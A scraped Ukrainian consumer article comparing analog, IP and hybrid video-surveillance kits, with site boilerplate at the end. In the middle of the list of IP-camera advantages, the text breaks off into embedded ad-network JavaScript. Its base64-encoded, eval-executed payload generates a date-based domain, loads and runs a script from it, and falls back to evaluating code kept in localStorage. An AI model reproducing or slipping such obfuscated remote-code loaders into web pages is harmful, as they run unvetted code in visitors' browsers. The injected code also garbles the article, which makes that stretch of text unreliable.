Комплект відеоспостереження: аналогова чи IP-система?

Якщо ви вирішили подбати про особисту безпеку, тоді комплект відеоспостереження – саме те, що обов’язково має бути в системі безпеки. У цей час перед покупцем постає питання щодо того, що вибрати – аналогове обладнання або комплект IP-відеоспостереження. Спробуємо розібратися докладніше, у чому переваги кожного з цих варіантів.

Що таке аналогове відеоспостереження?

В аналоговому комплекті відеоспостереження використовуються аналогові камери спостереження, в яких принцип роботи передбачає використання світлового потоку, що проходить через лінзу об’єктива і потрапляє на матрицю обладнання. Аналогові системи спостереження складаються з камер та відеореєстратора, який призначається для запису всієї інформації камер відеоспостереження. Інформація з камер спостереження проходить оцифрування та зберігається на жорсткому диску. Якщо говорити про переваги, які забезпечує аналогова система спостереження, можна зазначити:

технології доопрацьовані до кінця;просте використання системи;доступна вартість;висока надійність обладнання.

Якщо говорити про недоліки такого обладнання, можна відзначити обмеження функціоналу, низьку якість відео, а також необхідність постійного обслуговування. Цифрове відеоспостереження є технологічнішим, тому аналогове обладнання зараз використовується рідше.

Що таке IP відеоспостереження?

Логічно, що в комплектах IP відеоспостереження застосовуються мережеві IP камери і вони здатні працювати без застосування відеореєстратора для запису інформації. Відзняті матеріали можуть передавати через локальну мережу. В обладнанні може бути вбудований мікрофон, датчик руху, сигнал тривоги, нічне підсвічування, входи аудіо і т.д.

Налаштування обладнання здійснюється через браузер або спеціальний додаток. Є можливість бездротового підключення за допомогою технології Wi-Fi, що дозволяє проводити встановлення в важкодоступних місцях. Зберігати інформацію можна на жорсткому диску або на хмарному сервісі. Якщо говорити про переваги, то можна зазначити такі: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

можливість перегляду онлайн;висока якість проведення зйомки;наявність віддаленого доступу;можна підключатися за бездротовими технологіями;передбачено технологію РоЕ.

Якщо говорити про недоліки, то можна відзначити високу вартість.

Гібридні системи відеоспостереження

Альтернативним варіантом між аналогового та мережевого відеоспостереження є гібридні системи спостереження. Це вдосконалене аналогове відеоспостереження, якщо ви хочете перейти від аналогової системи на більш сучасне рішення без зміни кабельних ліній – підключення здійснюється через коаксіальний кабель.

Кожен із перелічених варіантів має свої переваги та недоліки. Вибір безпосередньо залежить від фінансових можливостей та цілей покупця. Фахівці в магазині завжди допоможуть зробити правильний вибір, орієнтуючись на всі побажання та завдання. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/komplekt-videosposterezhennya-analogova-chi-ip-sistema/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top